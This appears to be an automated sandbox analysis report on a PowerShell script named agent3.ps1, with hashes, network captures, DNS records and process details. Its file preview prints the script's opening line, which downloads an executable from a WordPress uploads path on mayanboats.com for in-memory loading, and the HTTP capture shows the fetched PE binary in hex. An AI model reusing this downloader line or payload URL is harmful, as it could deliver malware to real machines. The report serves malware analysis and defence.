MD5:	E017FB86A01209D2D1FF2FDB4ABC6B64
SHA1:	6786912CF2D651AF13C803766CC5D65A2D376BCC
SHA-256:	67217CAD7343906A41DA8519419536386F103291756960F441D457D3E2A63A7B
SHA-512:	C0D8910A8A7D4B484090EA34A6F4FC4EDDF505A2479872A1D7914A7DD0FDBFC27B5E105B058A8A18A246D030B654BD34D4DB7DD037B2AC32F1648495D86AEEE2
Malicious:	false
Reputation:	low
Preview:	...................................FL..................F.".. ......Yd...^hEV>c..z.:{.............................:..DG..Yr?.D..U..k0.&...&.......y.Yd.....Q>c...TQV>c......t...CFSF..1.....EW)B..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)BSX&r..........................d...A.p.p.D.a.t.a...B.V.1.....SX$r..Roaming.@......EW)BSX$r..........................$<f.R.o.a.m.i.n.g.....\.1.....EW.C..MICROS~1..D......EW)BSX#r............................ .M.i.c.r.o.s.o.f.t.....V.1.....EW.D..Windows.@......EW)BSX#r..........................Axj.W.i.n.d.o.w.s.......1.....EW+B..STARTM~1..n......EW)BSX#r....................D.....b60.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW(C..Programs..j......EW)BSX#r....................@.......D.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)BEW)B..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW)BSX(r.....0..........

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.373066679185185
Encrypted:	false
SSDEEP:	6144:lFVfpi6ceLP/9skLmb08yWWSPtaJG8nAge35OlMMhA2AX4WABlguNliL:DV1qyWWI/glMM6kF7Pq
MD5:	CE99CCB87E5401E2605419DBF84AD5B8
SHA1:	B92C40DD980780A623071FE8772BD67A3F59FABB
SHA-256:	390CF9F5EB180190CFE4B5C336817164FD7270FD9D10FC6ED4A80DD627532490
SHA-512:	8D660DAB4CD8A71982429D5BF47E37034442E41150E9C212AA6B9E2E529D55C56344CF67534755E84F7CF24A63F1F3254F73BD7DB9469B619D56084AB37388BD
Malicious:	false
Reputation:	low
Preview:	regfC...C....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmZJ.X>c...............................................................................................................................................................................................................................................................................................................................................s.l........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	ASCII text, with very long lines (4140), with CRLF line terminators
Entropy (8bit):	4.872240143803886
TrID:	Generic INI configuration (1001/1) 100.00%
File name:	agent3.ps1
File size:	7'323 bytes
MD5:	ccf28e7a27f926a87f8ec739ff1ad84a
SHA1:	de519f7fc4c5834408c2d2834ec0a2c935b320e0
SHA256:	44b1f7c3e3e01e54d2422fce3b9008ad4b17905681bc3d690d6300b0e996fea4
SHA512:	441073747adeb035665c492a2ae7e2acc48085a92e7cfacab3c3b06c594acbe4f7d3db1c5902a38384830aa995f0c81f0e72b0c027a978ecd82a556044ee6bb8
SSDEEP:	192:nvOuLf6+qUClbRZqwiJY5AH+W4BJeGZjf6H1XTMTqTn:nvQ+yo+yh
TLSH:	F7E179E5BE1C45E419BB226CDF928882AD4DA57415F88505F6BE8C0BF79FE2480F1B0D
File Content Preview:	[Byte[]]$image = (IWR -UseBasicParsing 'https://mayanboats.com/wp-content/uploads/helper2.exe').Content;....function GDT..{.. Param.. (.. [OutputType([Type])].. .. [Parameter( Position = 0)].. [Type[]].. $Param

File Icon


Icon Hash:	3270d6baae77db44

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 19, 2024 15:17:17.688361883 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:17.688424110 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:17.688513994 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:17.701896906 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:17.701920986 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.045999050 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.046149969 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.052186966 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.052200079 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.052501917 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.064809084 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.105897903 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.407965899 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.457145929 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.457180023 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.504057884 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.572418928 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.572429895 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.572460890 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.572478056 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.572489023 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.572504044 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.572542906 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.572565079 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.572582006 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.572583914 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.572604895 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.572616100 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.572633028 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.572643995 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.572690964 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.737354994 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.737376928 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.737442017 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.737474918 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.737500906 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.737528086 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.737715960 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.737735033 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.737768888 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.737776995 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.737806082 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.737826109 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.738251925 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.738267899 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.738344908 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.738353014 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.738429070 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.902338028 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.902364016 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.902486086 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.902523041 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.902584076 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.903137922 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.903160095 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.903201103 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.903212070 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.903261900 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.903285027 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.903570890 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.903587103 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.903645039 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.903654099 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.903683901 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.903711081 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.903716087 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.903723955 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.903764009 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.903809071 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.903832912 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.903848886 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.903913021 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.903920889 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.903964043 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.907731056 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.947391987 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.947422028 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.947501898 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.947585106 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:18.947623968 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:18.947675943 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:19.066543102 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:19.066566944 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:19.066761971 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:19.066831112 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:19.066868067 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:19.066890955 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:19.066895962 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:19.066919088 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:19.066956997 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:19.066956997 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:19.066982985 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:19.067239046 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:19.067279100 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:19.067303896 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:19.067318916 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:19.067348003 CET	443	49707	185.132.179.211	192.168.2.8
Feb 19, 2024 15:17:19.067352057 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:19.067399025 CET	49707	443	192.168.2.8	185.132.179.211
Feb 19, 2024 15:17:19.101711035 CET	49707	443	192.168.2.8	185.132.179.211

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 19, 2024 15:17:17.585248947 CET	63170	53	192.168.2.8	1.1.1.1
Feb 19, 2024 15:17:17.674267054 CET	53	63170	1.1.1.1	192.168.2.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 19, 2024 15:17:17.585248947 CET	192.168.2.8	1.1.1.1	0x984f	Standard query (0)	mayanboats.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 19, 2024 15:17:17.674267054 CET	1.1.1.1	192.168.2.8	0x984f	No error (0)	mayanboats.com		185.132.179.211	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

mayanboats.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.8	49707	185.132.179.211	443	2352	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-19 14:17:18 UTC	189	OUT	GET /wp-content/uploads/helper2.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: mayanboats.com Connection: Keep-Alive
2024-02-19 14:17:18 UTC	404	IN	HTTP/1.1 200 OK Connection: close content-type: application/x-msdownload last-modified: Wed, 07 Feb 2024 03:29:45 GMT accept-ranges: bytes content-length: 227288 date: Mon, 19 Feb 2024 14:17:18 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-02-19 14:17:18 UTC	964	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 0c bb f5 a3 48 da 9b f0 48 da 9b f0 48 da 9b f0 5c b1 98 f1 42 da 9b f0 5c b1 9e f1 c5 da 9b f0 5c b1 9f f1 5a da 9b f0 c8 a1 9f f1 59 da 9b f0 c8 a1 98 f1 5b da 9b f0 c8 a1 9e f1 60 da 9b f0 5c b1 9a f1 4d da 9b f0 48 da 9a f0 20 da 9b f0 c5 a1 92 f1 49 da 9b f0 c5 a1 64 f0 49 da 9b f0 48 da 0c f0 49 da 9b f0 c5 a1 99 f1 49 da 9b f0 52 69 63 68 48 da 9b f0 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$HHH\B\\ZY[`\MH IdIHIIRichH
2024-02-19 14:17:18 UTC	14994	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 14 53 8b d9 89 55 f8 57 33 ff 8b 43 3c 8b 44 18 78 03 c3 8b 50 1c 8b 48 20 03 d3 89 55 ec 03 cb 8b 50 24 03 d3 89 4d f4 89 55 f0 8b 50 18 89 55 fc 85 d2 74 63 56 0f 1f 44 00 00 8b 34 b9 33 c0 8a 0c 1e 03 f3 84 c9 74 2b 66 90 c1 e0 04 8d 76 01 0f be c9 03 c1 8b d0 81 e2 00 00 00 f0 74 07 8b ca c1 e9 18 33 c1 8a 0e f7 d2 23 c2 84 c9 75 da 8b 55 fc 3b 45 f8 74 0f 8b 4d f4 47 3b fa 72 ba 5e 5f 5b 8b e5 5d c3 8b 45 f0 8b 4d ec 5e 0f b7 04 78 8b 04 81 03 c3 5f 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 18 a1 00 70 41 00 33 c5 89 45 fc 53 8b d9 Data Ascii: USUW3C<DxPH UP$MUPUtcVD43t+fvt3#uU;EtMG;r^_[]EM^x_[]UpA3ES
2024-02-19 14:17:18 UTC	16384	IN	Data Raw: 40 18 8b 08 85 c9 74 10 8b 01 51 8b 70 08 8b ce ff 15 18 01 41 00 ff d6 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b c9 c3 55 8b ec 8b 4d 08 ff 55 0c 5d c2 08 00 55 8b ec 80 7d 0c 00 74 32 56 57 8b 7d 08 8b 37 81 3e 63 73 6d e0 75 21 83 7e 10 03 75 1b 81 7e 14 20 05 93 19 74 18 81 7e 14 21 05 93 19 74 0f 81 7e 14 22 05 93 19 74 06 5f 5e 33 c0 5d c3 e8 c7 04 00 00 89 70 10 8b 77 04 e8 bc 04 00 00 89 70 14 e8 a8 31 00 00 cc 55 8b ec e8 ab 04 00 00 8b 40 24 85 c0 74 0e 8b 4d 08 39 08 74 0c 8b 40 04 85 c0 75 f5 33 c0 40 5d c3 33 c0 5d c3 55 8b ec 8b 4d 0c 8b 55 08 56 8b 01 8b 71 04 03 c2 85 f6 78 0d 8b 49 08 8b 14 16 8b 0c 0a 03 ce 03 c1 5e 5d c3 55 8b ec 56 8b 75 08 57 8b 3e 81 3f 52 43 43 e0 74 12 81 3f 4d 4f 43 e0 74 0a 81 3f 63 73 6d e0 74 1b eb 13 e8 3f 04 Data Ascii: @tQpAMdY_^[UMU]U}t2VW}7>csmu!~u~ t~!t~"t_^3]pwp1U@$tM9t@u3@]3]UMUVqxI^]UVuW>?RCCt?MOCt?csmt?
2024-02-19 14:17:18 UTC	16384	IN	Data Raw: f4 ff ff 59 eb 0b 8b 47 04 89 30 83 47 04 04 33 db 6a 00 e8 44 f4 ff ff 59 8b c3 5e eb 8a 33 c0 50 50 50 50 50 e8 b4 df ff ff cc 8b ff 55 8b ec 81 ec 64 02 00 00 a1 00 70 41 00 33 c5 89 45 fc 8b 55 0c 8b 4d 10 53 8b 5d 08 89 8d a4 fd ff ff 56 57 3b d3 74 20 0f b7 02 8d 8d ab fd ff ff 50 e8 38 01 00 00 84 c0 75 07 83 ea 02 3b d3 75 e6 8b 8d a4 fd ff ff 0f b7 32 83 fe 3a 75 1a 8d 43 02 3b d0 74 13 51 33 ff 57 57 53 e8 e7 fe ff ff 83 c4 10 e9 f6 00 00 00 56 8d 8d ab fd ff ff e8 f9 00 00 00 2b d3 0f b6 c0 d1 fa 42 f7 d8 1b c0 33 ff 57 57 23 c2 57 89 85 a0 fd ff ff 8d 85 ac fd ff ff 50 57 53 ff 15 cc 00 41 00 8b f0 8b 85 a4 fd ff ff 83 fe ff 75 13 50 57 57 53 e8 95 fe ff ff 83 c4 10 8b f8 e9 a0 00 00 00 8b 48 04 2b 08 c1 f9 02 6a 2e 89 8d 9c fd ff ff 59 66 39 Data Ascii: YG0G3jDY^3PPPPPUdpA3EUMS]VW;t P8u;u2:uC;tQ3WWSV+B3WW#WPWSAuPWWSH+j.Yf9
2024-02-19 14:17:18 UTC	16384	IN	Data Raw: f8 06 6b c9 38 8b 04 85 50 81 41 00 0f b6 44 08 28 83 e0 40 5d c3 e8 ac bc ff ff c7 00 09 00 00 00 e8 8b 9f ff ff 33 c0 5d c3 6a 08 68 20 68 41 00 e8 f4 78 ff ff 83 3d b4 7c 41 00 01 7c 5b 8b 45 08 a8 40 74 4a 83 3d 50 77 41 00 00 74 41 83 65 fc 00 0f ae 55 08 c7 45 fc fe ff ff ff eb 3a 8b 45 ec 8b 00 81 38 05 00 00 c0 74 0b 81 38 1d 00 00 c0 74 03 33 c0 c3 33 c0 40 c3 8b 65 e8 83 25 50 77 41 00 00 83 65 08 bf 0f ae 55 08 eb c7 83 e0 bf 89 45 08 0f ae 55 08 8b 4d f0 64 89 0d 00 00 00 00 59 5f 5e 5b c9 c3 8b ff 55 8b ec 51 dd 7d fc db e2 0f bf 45 fc c9 c3 8b ff 55 8b ec 51 51 9b d9 7d fc 8b 4d 0c 8b 45 08 f7 d1 66 23 4d fc 23 45 0c 66 0b c8 66 89 4d f8 d9 6d f8 0f bf 45 fc c9 c3 8b ff 55 8b ec 8b 4d 08 83 ec 0c f6 c1 01 74 0a db 2d e8 3f 41 00 db 5d fc 9b Data Ascii: k8PAD(@]3]jh hAx=\|A\|[E@tJ=PwAtAeUE:E8t8t33@e%PwAeUEUMdY_^[UQ}EUQQ}MEf#M#EffMmEUMt-?A]
2024-02-19 14:17:18 UTC	16384	IN	Data Raw: 6d 00 6d 00 3a 00 73 00 73 00 00 00 00 00 65 00 6e 00 2d 00 55 00 53 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: mm:ssen-US
2024-02-19 14:17:18 UTC	16384	IN	Data Raw: 6f 6f 69 67 61 73 00 00 00 00 70 64 6b 6d 66 6d 62 6d 6a 79 68 64 6b 61 6f 61 65 6a 6a 78 66 69 70 7a 68 7a 62 77 6b 79 6e 70 72 6e 77 69 6d 61 75 63 62 75 78 77 74 77 72 75 72 78 73 6f 6c 66 6b 77 7a 62 64 76 62 68 66 65 6a 6d 6c 76 6d 74 66 78 65 77 71 72 69 63 6b 64 68 62 73 63 7a 6f 69 61 67 62 6b 67 68 00 00 00 7a 75 74 66 61 6d 69 76 70 79 70 77 67 6d 67 73 6f 66 69 6f 70 6e 73 75 00 00 00 00 66 63 73 69 70 78 63 75 76 71 62 69 73 68 62 6f 7a 00 00 00 65 63 68 6a 75 6e 71 78 67 74 6e 6b 6d 78 00 00 79 61 65 6c 68 61 71 73 79 6e 63 72 6c 65 70 6b 73 7a 63 6a 69 6d 76 63 79 64 69 79 66 75 77 6f 72 00 00 00 00 00 00 00 6e 66 66 66 67 65 71 72 66 69 6f 68 79 69 7a 76 72 71 7a 69 73 66 62 76 67 75 74 6f 6e 65 79 73 65 6f 7a 77 64 65 62 76 62 65 75 68 63 Data Ascii: ooigaspdkmfmbmjyhdkaoaejjxfipzhzbwkynprnwimaucbuxwtwrurxsolfkwzbdvbhfejmlvmtfxewqrickdhbsczoiagbkghzutfamivpypwgmgsofiopnsufcsipxcuvqbishbozechjunqxgtnkmxyaelhaqsyncrlepkszcjimvcydiyfuwornfffgeqrfiohyizvrqzisfbvgutoneyseozwdebvbeuhc
2024-02-19 14:17:18 UTC	16384	IN	Data Raw: 00 00 b6 00 00 ba 00 00 32 00 00 87 00 00 f0 00 00 f8 00 00 32 00 00 9a 00 00 3d 00 00 b4 00 00 b2 00 00 b2 00 00 81 00 00 fe 00 00 4e 00 00 87 00 00 42 00 00 7e 00 00 e2 00 00 1c 00 00 b7 00 00 37 00 00 ef 00 00 cb 00 00 1b 00 00 b2 00 00 c4 00 00 ba 00 00 05 00 00 87 00 00 bf 00 00 f8 00 00 1a 00 00 9a 00 00 03 00 00 b4 00 00 b7 00 00 b2 00 00 c1 00 00 fe 00 00 4f 00 00 87 00 00 55 00 00 7e 00 00 f0 00 00 1c 00 00 c4 00 00 37 00 00 b3 00 00 cb 00 00 68 00 00 b2 00 00 bd 00 00 ba 00 00 35 00 00 87 00 00 f1 00 00 f8 00 00 23 00 00 9a 00 00 39 00 00 b4 00 00 ed 00 00 b2 00 00 9d 00 00 fe 00 00 77 00 00 87 00 00 5f 00 00 7e 00 00 ff 00 00 1c 00 00 c7 00 00 37 00 00 83 00 00 cb 00 00 74 00 00 b2 00 00 b6 00 00 ba 00 00 23 00 00 87 00 00 f7 00 00 f8 00 00 68 Data Ascii: 22=NB~7OU~7h5#9w_~7t#h
2024-02-19 14:17:18 UTC	16384	IN	Data Raw: 00 d5 00 00 6e 00 00 84 00 00 4d 00 00 73 00 00 05 00 00 ba 00 00 47 00 00 46 00 00 29 00 00 dd 00 00 a7 00 00 fd 00 00 e3 00 00 0c 00 00 79 00 00 56 00 00 94 00 00 ee 00 00 40 00 00 18 00 00 ec 00 00 03 00 00 90 00 00 f1 00 00 d4 00 00 a9 00 00 b4 00 00 70 00 00 ea 00 00 e0 00 00 45 00 00 52 00 00 df 00 00 f7 00 00 c6 00 00 a1 00 00 5d 00 00 09 00 00 44 00 00 97 00 00 39 00 00 b6 00 00 0c 00 00 59 00 00 4b 00 00 24 00 00 1d 00 00 42 00 00 53 00 00 9a 00 00 4d 00 00 ca 00 00 6a 00 00 0c 00 00 c6 00 00 f0 00 00 b1 00 00 f5 00 00 7c 00 00 3f 00 00 16 00 00 39 00 00 5d 00 00 75 00 00 68 00 00 af 00 00 cd 00 00 11 00 00 8f 00 00 1f 00 00 7f 00 00 bc 00 00 ac 00 00 d3 00 00 08 00 00 40 00 00 33 00 00 d5 00 00 5e 00 00 84 00 00 4d 00 00 73 00 00 45 00 00 89 00 Data Ascii: nMsGF)yV@pER]D9YK$BSMj\|?9]uh@3^MsE
2024-02-19 14:17:18 UTC	16384	IN	Data Raw: b9 00 00 78 00 00 08 00 00 75 00 00 d2 00 00 60 00 00 ab 00 00 4b 00 00 36 00 00 c7 00 00 40 00 00 01 00 00 d4 00 00 b4 00 00 f3 00 00 71 00 00 98 00 00 1c 00 00 3d 00 00 b3 00 00 e2 00 00 5f 00 00 e1 00 00 4d 00 00 3b 00 00 32 00 00 c2 00 00 8a 00 00 49 00 00 00 00 00 b9 00 00 65 00 00 15 00 00 37 00 00 27 00 00 e2 00 00 dd 00 00 12 00 00 d4 00 00 f2 00 00 1a 00 00 f3 00 00 12 00 00 d0 00 00 4f 00 00 c8 00 00 10 00 00 46 00 00 96 00 00 9e 00 00 3a 00 00 45 00 00 b9 00 00 6f 00 00 1d 00 00 11 00 00 b9 00 00 65 00 00 d7 00 00 70 00 00 da 00 00 3f 00 00 22 00 00 d2 00 00 d5 00 00 78 00 00 c5 00 00 96 00 00 dd 00 00 f2 00 00 48 00 00 c8 00 00 62 00 00 46 00 00 37 00 00 4c 00 00 3b 00 00 45 00 00 ae 00 00 a8 00 00 6a 00 00 07 00 00 b9 00 00 11 00 00 11 00 00 Data Ascii: xu`K6@q=_M;2Ie7'OF:Eoep?"xHbF7L;Ej

Target ID:	0
Start time:	15:17:14
Start date:	19/02/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\agent3.ps1
Imagebase:	0x7ff6cb6b0000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	15:17:14
Start date:	19/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:17:18
Start date:	19/02/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 2352 -s 2800
Imagebase:	0x7ff79e000000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Function 00007FFB4AF33AB5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1596356894.00007FFB4AF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffb4af30000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
